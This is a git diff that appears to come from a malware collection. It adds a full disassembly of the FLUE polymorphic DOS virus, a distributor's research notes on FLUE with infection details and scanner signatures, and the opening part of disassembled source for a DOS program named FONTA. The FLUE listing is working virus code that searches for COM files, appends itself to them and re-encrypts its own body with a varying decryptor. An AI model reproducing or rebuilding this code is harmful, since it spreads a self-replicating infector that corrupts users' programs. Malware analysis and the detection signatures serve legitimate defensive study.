-0,0 +1,484 @@ + +1000:0000 Proc3: +1000:0000 cd 20 INT 20h ;Exit +1000:0079 Data37: +1000:0100 e4 40 Main: IN AL, 40h +1000:0102 86 e0 XCHG AH, AL +1000:0104 e4 40 IN AL, 40h +1000:0106 a3 a205 MOV WORD PTR [Data0], AX +1000:0109 be 1601 MOV SI, 0116h +1000:010c e8 8f04 CALL Proc0 +1000:010f e9 0100 JMP Jmp0 +1000:0112 db c3 +1000:0113 Jmp0: +1000:0113 e8 8404 CALL Proc1 +1000:0116 Data9: +1000:0116 e8 0000 CALL Proc2 +1000:0119 Proc2: +1000:0119 5d POP BP +1000:011a 81 ed 1901 SUB BP, 0119h +1000:011e eb 01 JMP Jmp1 +1000:0120 db 81 +1000:0121 Jmp1: +1000:0121 e4 21 IN AL, 21h +1000:0123 0c 02 OR AL, 02h +1000:0125 e6 21 OUT AL, 21h +1000:0127 b9 0300 MOV CX, 0003h +1000:012a bf 0001 MOV DI, 0100h +1000:012d 57 PUSH DI +1000:012e 8d b6 5204 LEA SI, WORD PTR [BP+Data1] +1000:0132 fc CLD +1000:0133 f3 REPNZ +1000:0134 a4 MOVSB +1000:0135 b4 47 MOV AH, 47h +1000:0137 32 d2 XOR DL, DL +1000:0139 8d b6 ae04 LEA SI, WORD PTR [BP+Data2] +1000:013d cd 21 INT 21h ;Get current directory +1000:013f b4 2f MOV AH, 2fh +1000:0141 cd 21 INT 21h ;Get DTA +1000:0143 06 PUSH ES +1000:0144 53 PUSH BX +1000:0145 b8 2435 MOV AX, 3524h +1000:0148 cd 21 INT 21h ;Get int vector 0x24 +1000:014a 3e +1000:014b 89 9e ee04 MOV WORD PTR DS:[BP+Data3], BX +1000:014f 3e +1000:0150 8c 86 f004 MOV WORD PTR DS:[BP+Data4], ES +1000:0154 0e PUSH CS +1000:0155 07 POP ES +1000:0156 fa CLI +1000:0157 b4 25 MOV AH, 25h +1000:0159 8d 96 4004 LEA DX, WORD PTR [BP+Data5] +1000:015d cd 21 INT 21h ;Set int vector 0x24 +1000:015f fb STI +1000:0160 3e +1000:0161 83 be a205 00 CMP WORD PTR DS:[BP+Data6], 00h +1000:0166 75 03 JNZ Jmp2 +1000:0168 e9 4602 JMP Jmp3 +1000:016b Jmp2: +1000:016b b4 1a MOV AH, 1ah +1000:016d 8d 96 6104 LEA DX, WORD PTR [BP+Data11] +1000:0171 cd 21 INT 21h ;Set DTA +1000:0173 e8 b402 CALL Proc4 +1000:0176 b1 05 MOV CL, 05h +1000:0178 d2 e8 SHR AL, CL +1000:017a fe c0 INC AL +1000:017c 3e +1000:017d 88 86 5104 MOV BYTE PTR DS:[BP+Data12], AL +1000:0181 Jmp7: +1000:0181 b4 4e MOV AH, 4eh +1000:0183 8d 96 5804 LEA DX, WORD PTR [BP+Data13] +1000:0187 eb 31 JMP Jmp5 +1000:0189 db 90 +1000:018a Jmp10: +1000:018a b8 0157 MOV AX, 5701h +1000:018d 3e +1000:018e 8b 8e 7704 MOV CX, WORD PTR DS:[BP+Data17] +1000:0192 3e +1000:0193 8b 96 7904 MOV DX, WORD PTR DS:[BP+Data18] +1000:0197 cd 21 INT 21h ;Get/set file timestamp +1000:0199 b4 3e MOV AH, 3eh +1000:019b cd 21 INT 21h ;Close file +1000:019d b8 0143 MOV AX, 4301h +1000:01a0 32 ed XOR CH, CH +1000:01a2 3e +1000:01a3 8a 8e 7604 MOV CL, BYTE PTR DS:[BP+Data19] +1000:01a7 8d 96 7f04 LEA DX, WORD PTR [BP+Data15] +1000:01ab cd 21 INT 21h ;Change file attributes +1000:01ad 3e +1000:01ae 80 be 5104 00 CMP BYTE PTR DS:[BP+Data12], 00h +1000:01b3 75 03 JNZ Jmp12 +1000:01b5 e9 f901 JMP Jmp3 +1000:01b8 Jmp12: +1000:01b8 b4 4f MOV AH, 4fh +1000:01ba Jmp5: +1000:01ba b9 0600 MOV CX, 0006h +1000:01bd cd 21 INT 21h ;Find file +1000:01bf 73 12 JNB Jmp6 +1000:01c1 3e +1000:01c2 fe 86 5104 INC BYTE PTR DS:[BP+Data12] +1000:01c6 b4 3b MOV AH, 3bh +1000:01c8 8d 96 5e04 LEA DX, WORD PTR [BP+Data14] +1000:01cc cd 21 INT 21h ;Change directory +1000:01ce 73 b1 JNB Jmp7 +1000:01d0 e9 de01 JMP Jmp3 +1000:01d3 Jmp6: +1000:01d3 b8 0143 MOV AX, 4301h +1000:01d6 33 c9 XOR CX, CX +1000:01d8 8d 96 7f04 LEA DX, WORD PTR [BP+Data15] +1000:01dc cd 21 INT 21h ;Change file attributes +1000:01de b8 023d MOV AX, 3d02h +1000:01e1 cd 21 INT 21h ;Open file +1000:01e3 73 03 JNB Jmp8 +1000:01e5 e9 c901 JMP Jmp3 +1000:01e8 Jmp8: +1000:01e8 93 XCHG AX, BX +1000:01e9 83 fb 04 CMP BX, 04h +1000:01ec 77 03 JA Jmp9 +1000:01ee e9 c001 JMP Jmp3 +1000:01f1 Jmp9: +1000:01f1 3e +1000:01f2 89 9e 4f04 MOV WORD PTR DS:[BP+Data16], BX +1000:01f6 b4 3f MOV AH, 3fh +1000:01f8 b9 0300 MOV CX, 0003h +1000:01fb 8d 96 5204 LEA DX, WORD PTR [BP+Data1] +1000:01ff cd 21 INT 21h ;Read file +1000:0201 e8 0302 CALL Proc5 +1000:0204 3d 73bb CMP AX, bb73h +1000:0207 73 81 JNB Jmp10 +1000:0209 3d f401 CMP AX, 01f4h +1000:020c 73 03 JNB Jmp11 +1000:020e e9 79ff JMP Jmp10 +1000:0211 Jmp11: +1000:0211 3e +1000:0212 80 be 5204 e9 CMP BYTE PTR DS:[BP+Data1], e9h +1000:0217 75 0d JNZ Jmp13 +1000:0219 3e +1000:021a 2b 86 5304 SUB AX, WORD PTR DS:[BP+Data20] +1000:021e 3d 9e04 CMP AX, 049eh +1000:0221 75 03 JNZ Jmp13 +1000:0223 e9 64ff JMP Jmp10 +1000:0226 Jmp13: +1000:0226 e8 0102 CALL Proc4 +1000:0229 b1 06 MOV CL, 06h +1000:022b d3 e8 SHR AX, CL +1000:022d 50 PUSH AX +1000:022e e8 f901 CALL Proc4 +1000:0231 92 XCHG AX, DX +1000:0232 33 c0 XOR AX, AX +1000:0234 8e d8 MOV DS, AX +1000:0236 b4 40 MOV AH, 40h +1000:0238 59 POP CX +1000:0239 cd 21 INT 21h ;Write file +1000:023b 0e PUSH CS +1000:023c 1f POP DS +1000:023d e8 c701 CALL Proc5 +1000:0240 e8 e701 CALL Proc4 +1000:0243 0b c0 OR AX, AX +1000:0245 75 03 JNZ Jmp14 +1000:0247 e9 6701 JMP Jmp3 +1000:024a Jmp14: +1000:024a 3e +1000:024b 89 86 a205 MOV WORD PTR DS:[BP+Data6], AX +1000:024f 3e +1000:0250 89 9e 8105 MOV WORD PTR DS:[BP+Data21], BX +1000:0254 b9 2600 MOV CX, 0026h +1000:0257 8d b6 7405 LEA SI, WORD PTR [BP+Data22] +1000:025b 8d be ad05 LEA DI, WORD PTR [BP+Data8] +1000:025f fc CLD +1000:0260 f3 REPNZ +1000:0261 a4 MOVSB +1000:0262 e8 b701 CALL Proc6 +1000:0265 d0 e8 SHR AL, 1 +1000:0267 3c 02 CMP AL, 02h +1000:0269 72 1f JB Jmp15 +1000:026b 77 3a JA Jmp16 +1000:026d 3e +1000:026e c6 86 9b05 e3 MOV BYTE PTR DS:[BP+Data23], e3h +1000:0273 3e +1000:0274 c6 86 9d05 37 MOV BYTE PTR DS:[BP+Data24], 37h +1000:0279 3e +1000:027a c7 86 a405 3104 MOV WORD PTR DS:[BP+Jmp4], 0431h +1000:0280 3e +1000:0281 c7 86 a805 4646 MOV WORD PTR DS:[BP+Data25], 4646h +1000:0287 eb 38 JMP Jmp17 +1000:0289 db 90 +1000:028a Jmp15: +1000:028a 3e +1000:028b c6 86 9b05 e7 MOV BYTE PTR DS:[BP+Data23], e7h +1000:0290 3e +1000:0291 c6 86 9d05 1d MOV BYTE PTR DS:[BP+Data24], 1dh +1000:0296 3e +1000:0297 c7 86 a405 3107 MOV WORD PTR DS:[BP+Jmp4], 0731h +1000:029d 3e +1000:029e c7 86 a805 4343 MOV WORD PTR DS:[BP+Data25], 4343h +1000:02a4 eb 1b JMP Jmp17 +1000:02a6 db 90 +1000:02a7 Jmp16: +1000:02a7 3e +1000:02a8 c6 86 9b05 e6 MOV BYTE PTR DS:[BP+Data23], e6h +1000:02ad 3e +1000:02ae c6 86 9d05 3c MOV BYTE PTR DS:[BP+Data24], 3ch +1000:02b3 3e +1000:02b4 c7 86 a405 3105 MOV WORD PTR DS:[BP+Jmp4], 0531h +1000:02ba 3e +1000:02bb c7 86 a805 4747 MOV WORD PTR DS:[BP+Data25], 4747h +1000:02c1 Jmp17: +1000:02c1 e8 5801 CALL Proc6 +1000:02c4 3c 04 CMP AL, 04h +1000:02c6 72 1c JB Jmp18 +1000:02c8 3e +1000:02c9 80 be 9a05 46 CMP BYTE PTR DS:[BP+Proc1], 46h +1000:02ce 72 08 JB Jmp19 +1000:02d0 77 0c JA Jmp20 +1000:02d2 3c 05 CMP AL, 05h +1000:02d4 75 62 JNZ Jmp21 +1000:02d6 eb e9 JMP Jmp17 +1000:02d8 Jmp19: +1000:02d8 3c 04 CMP AL, 04h +1000:02da 75 47 JNZ Jmp24 +1000:02dc eb e3 JMP Jmp17 +1000:02de Jmp20: +1000:02de 3c 06 CMP AL, 06h +1000:02e0 75 6b JNZ Jmp23 +1000:02e2 eb dd JMP Jmp17 +1000:02e4 Jmp18: +1000:02e4 3c 02 CMP AL, 02h +1000:02e6 72 17 JB Jmp25 +1000:02e8 77 24 JA Jmp26 +1000:02ea 3e +1000:02eb c6 86 a105 ba MOV BYTE PTR DS:[BP+Data26], bah +1000:02f0 3e +1000:02f1 80 86 a505 10 ADD BYTE PTR DS:[BP+Data27], 10h +1000:02f6 3e +1000:02f7 c6 86 a705 d2 MOV BYTE PTR DS:[BP+Data28], d2h +1000:02fc eb 61 JMP Jmp22 +1000:02fe db 90 +1000:02ff Jmp25: +1000:02ff 3e +1000:0300 c6 86 a105 b8 MOV BYTE PTR DS:[BP+Data26], b8h +1000:0305 3e +1000:0306 c6 86 a705 d0 MOV BYTE PTR DS:[BP+Data28], d0h +1000:030b eb 52 JMP Jmp22 +1000:030d db 90 +1000:030e Jmp26: +1000:030e 3e +1000:030f c6 86 a105 bd MOV BYTE PTR DS:[BP+Data26], bdh +1000:0314 3e +1000:0315 80 86 a505 28 ADD BYTE PTR DS:[BP+Data27], 28h +1000:031a 3e +1000:031b c6 86 a705 d5 MOV BYTE PTR DS:[BP+Data28], d5h +1000:0320 eb 3d JMP Jmp22 +1000:0322 db 90 +1000:0323 Jmp24: +1000:0323 3e +1000:0324 c6 86 a105 bb MOV BYTE PTR DS:[BP+Data26], bbh +1000:0329 3e +1000:032a 80 86 a505 18 ADD BYTE PTR DS:[BP+Data27], 18h +1000:032f 3e +1000:0330 c6 86 a705 d3 MOV BYTE PTR DS:[BP+Data28], d3h +1000:0335 eb 28 JMP Jmp22 +1000:0337 db 90 +1000:0338 Jmp21: +1000:0338 3e +1000:0339 c6 86 a105 be MOV BYTE PTR DS:[BP+Data26], beh +1000:033e 3e +1000:033f 80 86 a505 30 ADD BYTE PTR DS:[BP+Data27], 30h +1000:0344 3e +1000:0345 c6 86 a705 d6 MOV BYTE PTR DS:[BP+Data28], d6h +1000:034a eb 13 JMP Jmp22 +1000:034c db 90 +1000:034d Jmp23: +1000:034d 3e +1000:034e c6 86 a105 bf MOV BYTE PTR DS:[BP+Data26], bfh +1000:0353 3e +1000:0354 80 86 a505 38 ADD BYTE PTR DS:[BP+Data27], 38h +1000:0359 3e +1000:035a c6 86 a705 d7 MOV BYTE PTR DS:[BP+Data28], d7h +1000:035f Jmp22: +1000:035f 8d b6 1601 LEA SI, WORD PTR [BP+Data9] +1000:0363 8b fe MOV DI, SI +1000:0365 8b de MOV BX, SI +1000:0367 55 PUSH BP +1000:0368 e8 3302 CALL Proc0 +1000:036b 5d POP BP +1000:036c b8 0042 MOV AX, 4200h +1000:036f 3e +1000:0370 8b 9e 4f04 MOV BX, WORD PTR DS:[BP+Data16] +1000:0374 33 c9 XOR CX, CX +1000:0376 33 d2 XOR DX, DX +1000:0378 cd 21 INT 21h ;Seek on file +1000:037a b4 40 MOV AH, 40h +1000:037c b9 0300 MOV CX, 0003h +1000:037f 8d 96 5504 LEA DX, WORD PTR [BP+Data29] +1000:0383 cd 21 INT 21h ;Write file +1000:0385 b8 00b8 MOV AX, b800h +1000:0388 8e c0 MOV ES, AX +1000:038a 8e d8 MOV DS, AX +1000:038c 33 f6 XOR SI, SI +1000:038e 33 ff XOR DI, DI +1000:0390 b9 1800 MOV CX, 0018h +1000:0393 51 PUSH CX +1000:0394 b9 5000 MOV CX, 0050h +1000:0397 ad LODSW +1000:0398 50 PUSH AX +1000:0399 e2 fc LOOP Data30 +1000:039b b9 5000 MOV CX, 0050h +1000:039e 58 POP AX +1000:039f ab STOSW +1000:03a0 e2 fc LOOP Data31 +1000:03a2 59 POP CX +1000:03a3 e2 ee LOOP Data32 +1000:03a5 0e PUSH CS +1000:03a6 0e PUSH CS +1000:03a7 1f POP DS +1000:03a8 07 POP ES +1000:03a9 3e +1000:03aa fe 8e 5104 DEC BYTE PTR DS:[BP+Data12] +1000:03ae e9 d9fd JMP Jmp10 +1000:03b1 Jmp3: +1000:03b1 8d b6 ce03 LEA SI, WORD PTR [BP+Data7] +1000:03b5 8d be ad05 LEA DI, WORD PTR [BP+Data8] +1000:03b9 b9 3900 MOV CX, 0039h +1000:03bc fc CLD +1000:03bd f3 REPNZ +1000:03be a4 MOVSB +1000:03bf 8d b6 1601 LEA SI, WORD PTR [BP+Data9] +1000:03c3 8b fe MOV DI, SI +1000:03c5 8b de MOV BX, SI +1000:03c7 b9 c901 MOV CX, 01c9h +1000:03ca 55 PUSH BP +1000:03cb e9 d601 JMP Jmp4 +1000:03ce Data7: +1000:03ce db 5d,b8,24,25,3e,8b,96,f0,04,8e,da,3e,8b,96,ee,04,cd,21,b4,1a +1000:03e2 db 5a,1f,cd,21,0e,1f,b4,3b,8d,96,ad,04,cd,21,e4,21,24,fd,e6,21 +1000:03f6 db 33,c0,33,db,33,c9,33,d2,33,ed,be,00,01,bf,00,01,c3 +1000:0407 Proc5: +1000:0407 b8 0242 MOV AX, 4202h +1000:040a 33 c9 XOR CX, CX +1000:040c 33 d2 XOR DX, DX +1000:040e cd 21 INT 21h ;Seek on file +1000:0410 2d 0300 SUB AX, 0003h +1000:0413 3e +1000:0414 89 86 5604 MOV WORD PTR DS:[BP+Data41], AX +1000:0418 05 0300 ADD AX, 0003h +1000:041b c3 RET +1000:041c Proc6: +1000:041c e8 0b00 CALL Proc4 +1000:041f 24 0f AND AL, 0fh +1000:0421 d0 e8 SHR AL, 1 +1000:0423 3c 05 CMP AL, 05h +1000:0425 77 f5 JA Proc6 +1000:0427 fe c0 INC AL +1000:0429 c3 RET +1000:042a Proc4: +1000:042a b4 2c MOV AH, 2ch +1000:042c cd 21 INT 21h ;Get time +1000:042e 86 ea XCHG CH, DL +1000:0430 90 NOP +1000:0431 b4 2c MOV AH, 2ch +1000:0433 cd 21 INT 21h ;Get time +1000:0435 86 ca XCHG CL, DL +1000:0437 e4 40 IN AL, 40h +1000:0439 86 e0 XCHG AH, AL +1000:043b e4 40 IN AL, 40h +1000:043d 33 c1 XOR AX, CX +1000:043f c3 RET +1000:0440 Data5: +1000:0440 db b9,09,00,58,e2,fd,5d,1f,07,5a,1f,9d,e9,62,ff,00,00,00,eb,10 +1000:044f Data16: +1000:0451 Data12: +1000:0452 Data1: +1000:0453 Data20: +1000:0454 db 90,e9,fd,fe +1000:0455 Data29: +1000:0456 Data41: +1000:0458 Data13: +1000:0458 db '*.COM' +1000:045d db 00,2e,2e,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 +1000:045e Data14: +1000:0461 Data11: +1000:0471 db 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 +1000:0476 Data19: +1000:0477 Data17: +1000:0479 Data18: +1000:047f Data15: +1000:0485 db 00,00,00,00,00,00,00,20,22,9d,ed,e6,20,e0 +1000:0493 e2 ee LOOP Data33 +1000:0495 20 f3 AND BL, DH +1000:0497 ad LODSW +1000:0498 87 de XCHG BX, SI +1000:049a 3c 22 CMP AL, 22h +1000:049c 2c 20 SUB AL, 20h +1000:049e f3 REPNZ +1000:049f e0 79 LOOPNZ Data34 +1000:04a1 f3 REPNZ +1000:04a2 3a 20 CMP AH, BYTE PTR [BX+SI] +1000:04a4 5b POP BX +1000:04a5 44 INC SP +1000:04a6 e0 52 LOOPNZ Data35 +1000:04a8 db 6b,52,e0,59,5d,5c,00,00,00,00,00,00,00,00,00,00,00,00,00,00 +1000:04ae Data2: +1000:04bc db 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 +1000:04d0 db 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 +1000:04e4 db 00,00,00,00,00,00,00,00,00,00,00,00,00,00 +1000:04ee Data3: +1000:04f0 Data4: +1000:04f2 db 'Hatsjeee' +1000:04fa 6b 52 e0 595d XOR WORD PTR [BP+SIData36], 5d59h +1000:04fc 20 28 AND BYTE PTR [BX+SI], CH +1000:04fe 43 INC BX +1000:04ff 29 20 SUB WORD PTR [BX+SI], SP +1000:0501 31 39 XOR WORD PTR [BX+DI], DI +1000:0503 39 32 CMP WORD PTR [BP+SI], SI +1000:0505 2f DAS +1000:0506 31 39 XOR WORD PTR [BX+DI], DI +1000:0508 39 33 CMP WORD PTR [BP+DI], SI +1000:050a 20 62 79 AND BYTE PTR [BP+SI+Data37], AH +1000:050d 20 54 72 AND BYTE PTR [SI+Data38], DL +1000:0510 db 'idenT / [D' +1000:051a 69 64 65 6e54 XOR WORD PTR [SI+Data39], 546eh +1000:051c db 6b,52,e0 +1000:051f db 'Y]Oh, BTW it's from ' +1000:0533 db 'Holland, and is call' +1000:0547 db 'ed THE FLUEFor those' +1000:055b db ' who are interested' +1000:056e 6b 52 e0 595d XOR WORD PTR [BP+SIData36], 5d59h +1000:056f 2e +1000:0570 2e +1000:0571 2e +1000:0572 2e +1000:0573 2e +1000:0574 Data22: +1000:0574 58 POP AX +1000:0575 5d POP BP +1000:0576 55 PUSH BP +1000:0577 50 PUSH AX +1000:0578 3e +1000:0579 c6 86 ad05 c3 MOV BYTE PTR DS:[BP+Data8], c3h +1000:057e b4 40 MOV AH, 40h +1000:0580 bb 0000 MOV BX, 0000h +1000:0581 Data21: +1000:0583 b9 9b04 MOV CX, 049bh +1000:0586 8d 96 1301 LEA DX, WORD PTR [BP+Jmp0] +1000:058a cd 21 INT 21h ;Write file +1000:058c 8d be 9e05 LEA DI, WORD PTR [BP+Proc0] +1000:0590 57 PUSH DI +1000:0591 8d b6 1601 LEA SI, WORD PTR [BP+Data9] +1000:0595 8b fe MOV DI, SI +1000:0597 8b de MOV BX, SI +1000:0599 c3 RET +1000:059a Proc1: +1000:059a 89 e3 MOV BX, SP +1000:059b Data23: +1000:059c 8b 37 MOV SI, WORD PTR [BX] +1000:059d Data24: +1000:059e Proc0: +1000:059e b9 4002 MOV CX, 0240h +1000:05a1 Data26: +1000:05a1 b8 0000 MOV AX, 0000h +1000:05a2 Data6: +1000:05a4 Jmp4: +1000:05a4 31 04 XOR WORD PTR [SI], AX +1000:05a5 Data27: +1000:05a6 f7 d0 NOT AX +1000:05a7 Data28: +1000:05a8 Data25: +1000:05a8 46 INC SI +1000:05a9 46 INC SI +1000:05aa 49 DEC CX +1000:05ab 75 f7 JNZ Jmp4 +1000:05ad Data8: +1000:05ad c3 RET +1000:ffe0 Data36: +2f18:0393 Data32: +2f18:0397 Data30: +2f18:039e Data31: +2f18:0483 Data33: +2f18:04fa Data35: +2f18:051a Data34: +2f18:056e Data40: +2f18:05a2 Data0: +eda4:0000 Data10: +eda4:0065 Data39: +eda4:0072 Data38: diff --git a/MSDOS/Virus.MSDOS.Unknown.flue.txt b/MSDOS/Virus.MSDOS.Unknown.flue.txt new file mode 100644 index 00000000..e2194407 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.flue.txt @@ -0,0 +1,140 @@ +Ŀ + + This Virus Came To You By Way Of... + + + + + + + + + + Computer Research & Information Service + + + Cris is a group of computer users that have a true interest in + Computer Viruses and Trojans, as well as how they work. + + Members of Cris feel a need, not only to be up on the latest + Bombs, Trojans, Worms, and Viruses, but to safely transfer these + files into the hands of other dedicated researchers. + + Cris cannot be held responsible for the use or misuse of these + files. Cris releases are sent out to better the knowledge of the + virus community, for those who would like to learn more about them + and how they work. + + Also, all Cris releases have been pre-tested and informative text + files are enclosed with valuable information regarding the type of + virus, how it works, and removal information. If the virus you + downloaded is not a Cris release, you don't know what you've got. + + DuWayne Bonkoski + (Original Text Written By Michael Paris) + + + +Ŀ + Cris Release Date:12/18/93 + Type: Virus + + +Ŀ + VSUM Information - Quoted from Patricia M. Hoffman's Hypertext VSUM +Ĵ + No Information Found + + +Ŀ + Scanning Results +Ĵ + + McAfee's ViruScan Reports - Detected [Flue] + File had to be deleted + F-Prot's ViruScan Reports - Detected [Flue] + File had to be deleted + TBAV's ViruScan Reports - Detected [Flue] + Successfully repaired executable + + + +Ŀ + Researcher's Notes +Ĵ + The FLUE virus is a polymorphic virus which infects COM files only. The + FLUE virus has a very visible way to letting you know it has infected + a file. The virus will "flip" a character screen from right to left or + vice versa. The screen flip does not work on monochrome monitors, however, + because the virus is hard-coded to read segment B800 which is where screen + information lies for color text modes. Monochrome video lies in + the B000 segment and the virus does not have a routine to sense which + type of video is being used. + + The virus hooks interrupt 24 (Critical Error Handler) which causes the + virus to replicate if a critical error occurs during execution. + + The virus does not become memory resident as far as I can tell. + + A character string can be found within the virus body which may appear + un-encrypted within infected files. The string reads as follows: + + Hatsjeee!! 1992/1993 by TridenT / [DRkRY]Oh, BTW it's from Holland, + and is called the FLUEFor those who are interested...... + + + Encryption + ========== + The FLUE encrypts itself by XOR'ing the body of the virus with a + randomly generated word varaiable and then uses the variable's complement + on the next encryption cycle. + + + Infection + ========= + The FLUE infects COM files having a length between 500 and 47987 bytes. + The virus does not check to see if the file has already been infected and + will attempt to re-infect an already infected file. + The decryption routine the virus creates is very polymorphic. The program + will randomly change which registers it uses to decrypt itself for each + infected file. + + The infected files grow by a varying number of bytes. The virus + copies a random number of bytes from the zero page and appends them to + the end of the executable before infecting the file. This is what causes + the random growth. + + Upon execution of an infected file, the virus will try to infect between + one and eight files plus one more for each directory it moves into. + + An interesting note on how the virus appends itself to other COM files. + At first glance, the source codes does not show any significant file + write routines that are necessary to cause replication. It took me + a while to figure out how the virus accomplished this. It does this + by building it's own write routine as it runs in memory. Just another + example of the polymorphic capabilities of this virus. + + + Detection + ========= + All scanners tested will detect this virus. + + This virus can be detected using the following scan strings (for those + who are using older/other scan utilities): + + 89?18B?1B94002?331?1F7?349 - TBAV + 89??8B??B94002??????31??F7??????49 - F-PROT + 89?8B?B94002???31?F7???49 - SCAN + + + Summary + ======= + I have to admit, the virus was a challenge for me due to it's polymorphic + capabilities. I had to step through it a couple of times to get a feel + for what was going on. I'm not sure why all the polymorphism is used + in this particular strain since the visual cues easily let you know + something unusual is happening. Otherwise, this virus is a pretty fast + replicator that wants to be noticed in its own little way. + + + diff --git a/MSDOS/Virus.MSDOS.Unknown.fonta.asm b/MSDOS/Virus.MSDOS.Unknown.fonta.asm new file mode 100644 index 00000000..de548440 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.fonta.asm @@ -0,0 +1,671 @@ + +PAGE 59,132 + +; +; +; FONTA +; +; Created: 19-Jan-92 +; Code type: special +; Passes: 5 Analysis Options on: none +; +; + +data_28e equ 1003h ;* +data_29e equ 1232h ;* +data_30e equ 180Ch ;* +data_33e equ 2005h ;* +data_36e equ 2412h ;* +data_38e equ 3079h ;* +data_47e equ 7830h ;* +data_50e equ 91F0h ;* +data_51e equ 99BDh ;* +data_53e equ 0A901h ;* +data_56e equ 0B3A1h ;* +data_60e equ 0BD01h ;* +data_61e equ 0BF04h ;* +data_70e equ 0F601h ;* +data_71e equ 0F630h ;* +data_72e equ 0F712h ;* + +;-------------------------------------------------------------- seg_a ---- + +seg_a segment byte public + assume cs:seg_a , ds:seg_a + + mov ax,3463h + mov dx,75Ch + cmp ax,sp + jae loc_2 ; Jump if above or = + mov ax,sp + sub ax,344h + and ax,0FFF0h + mov di,ax + mov cx,0A2h + mov si,17Ch + cld ; Clear direction + rep movsw ; Rep when cx >0 Mov [si] to es:[di] + mov bx,ax + mov cl,4 + shr bx,cl ; Shift w/zeros fill + mov cx,ds + add bx,cx + push bx + xor bx,bx ; Zero register + push bx + retf ; Return far + db 0Dh, 01h, 41h + db 'nother Fine aHa/nBa Elite/WareZZ' + db 'ZZZZZZZZZZZZZZZZNot enough memor' + db 'y$' +loc_2: + mov ax,900h + mov dx,15Fh + int 21h ; DOS Services ah=function 09h + ; display char string at ds:dx + int 20h ; DOS program terminate + nop + std ; Set direction flag + mov di,ax + dec di + dec di + mov si,offset data_22 + add si,dx + mov cx,dx + shr cx,1 ; Shift w/zeros fill + rep movsw ; Rep when cx >0 Mov [si] to es:[di] + cld ; Clear direction + xchg si,di + inc si + inc si + mov di,100h + lodsw ; String [si] to ax + xchg ax,bp + mov dx,10h + jmp short loc_12 + db 90h +loc_3: + lodsw ; String [si] to ax + xchg ax,bp + mov dl,10h + jmp short loc_14 +loc_4: + lodsw ; String [si] to ax + xchg ax,bp + mov dl,10h + jmp short loc_15 +loc_5: + lodsw ; String [si] to ax + xchg ax,bp + mov dl,10h + jmp short loc_16 +loc_6: + lodsw ; String [si] to ax + xchg ax,bp + mov dl,10h + jmp short loc_20 +loc_7: + lodsw ; String [si] to ax + xchg ax,bp + mov dl,10h + jmp short loc_21 +loc_8: + lodsw ; String [si] to ax + xchg ax,bp + mov dl,10h + jmp short loc_22 +loc_9: + lodsw ; String [si] to ax + xchg ax,bp + mov dl,10h + jmp short loc_23 +loc_10: + lodsw ; String [si] to ax + xchg ax,bp + mov dl,10h + jc loc_13 ; Jump if carry Set +loc_11: + movsb ; Mov [si] to es:[di] +loc_12: + shr bp,1 ; Shift w/zeros fill + dec dx + jz loc_10 ; Jump if zero + jnc loc_11 ; Jump if carry=0 +loc_13: + xor cx,cx ; Zero register + xor bx,bx ; Zero register + shr bp,1 ; Shift w/zeros fill + dec dx + jz loc_3 ; Jump if zero +loc_14: + rcl bx,1 ; Rotate thru carry + shr bp,1 ; Shift w/zeros fill + dec dx + jz loc_4 ; Jump if zero +loc_15: + rcl bx,1 ; Rotate thru carry + test bx,bx + jz loc_18 ; Jump if zero + shr bp,1 ; Shift w/zeros fill + dec dx + jz loc_5 ; Jump if zero +loc_16: + rcl bx,1 ; Rotate thru carry + cmp bl,6 + jb loc_18 ; Jump if below + shr bp,1 ; Shift w/zeros fill + dec dx + jnz loc_17 ; Jump if not zero + lodsw ; String [si] to ax + xchg ax,bp + mov dl,10h +loc_17: + rcl bx,1 ; Rotate thru carry +loc_18: + mov cl,byte ptr cs:[11Ch][bx] + cmp cl,0Ah + je loc_26 ; Jump if equal +loc_19: + xor bx,bx ; Zero register + cmp cx,2 + je loc_25 ; Jump if equal + shr bp,1 ; Shift w/zeros fill + dec dx + jz loc_6 ; Jump if zero +loc_20: + jc loc_25 ; Jump if carry Set + shr bp,1 ; Shift w/zeros fill + dec dx + jz loc_7 ; Jump if zero +loc_21: + rcl bx,1 ; Rotate thru carry + shr bp,1 ; Shift w/zeros fill + dec dx + jz loc_8 ; Jump if zero +loc_22: + rcl bx,1 ; Rotate thru carry + shr bp,1 ; Shift w/zeros fill + dec dx + jz loc_9 ; Jump if zero +loc_23: + rcl bx,1 ; Rotate thru carry + cmp bl,2 + jae loc_27 ; Jump if above or = +loc_24: + mov bh,byte ptr cs:[12Ch][bx] +loc_25: + lodsb ; String [si] to al + mov bl,al + push si + mov si,di + sub si,bx + rep movsb ; Rep when cx >0 Mov [si] to es:[di] + pop si + jmp short loc_12 +loc_26: + lodsb ; String [si] to al + add cl,al + adc ch,0 + cmp al,0FFh + jne loc_19 ; Jump if not equal + jmp short loc_31 +loc_27: + shr bp,1 ; Shift w/zeros fill + dec dx + jnz loc_28 ; Jump if not zero + lodsw ; String [si] to ax + xchg ax,bp + mov dl,10h +loc_28: + rcl bx,1 ; Rotate thru carry + cmp bl,8 + jb loc_24 ; Jump if below + shr bp,1 ; Shift w/zeros fill + dec dx + jnz loc_29 ; Jump if not zero + lodsw ; String [si] to ax + xchg ax,bp + mov dl,10h +loc_29: + rcl bx,1 ; Rotate thru carry + cmp bl,17h + jb loc_24 ; Jump if below + shr bp,1 ; Shift w/zeros fill + dec dx + jnz loc_30 ; Jump if not zero + lodsw ; String [si] to ax + xchg ax,bp + mov dl,10h +loc_30: + rcl bx,1 ; Rotate thru carry + and bx,0DFh + xchg bl,bh + jmp short loc_25 +loc_31: + xor ax,ax ; Zero register + push es + mov bx,100h + push bx + mov bx,ax + mov cx,ax + mov dx,ax + mov bp,ax + mov si,ax + mov di,ax + retf ; Return far + db 03h, 00h, 02h, 0Ah, 04h, 05h + db 00h, 00h, 00h, 00h, 00h, 00h + db 06h, 07h, 08h, 09h, 01h, 02h + db 00h, 00h, 03h, 04h, 05h, 06h + db 00h + db 7 dup (0) + db 07h, 08h, 09h, 0Ah, 0Bh, 0Ch + db 0Dh, 90h,0A0h, 00h,0EBh, 33h + db 90h, 0Dh, 20h, 01h, 0Dh, 0Ah + db 20h, 41h, 6Eh, 6Fh, 00h, 00h + db 'ther fine aHa/nB' + db 0C0h + db 9, 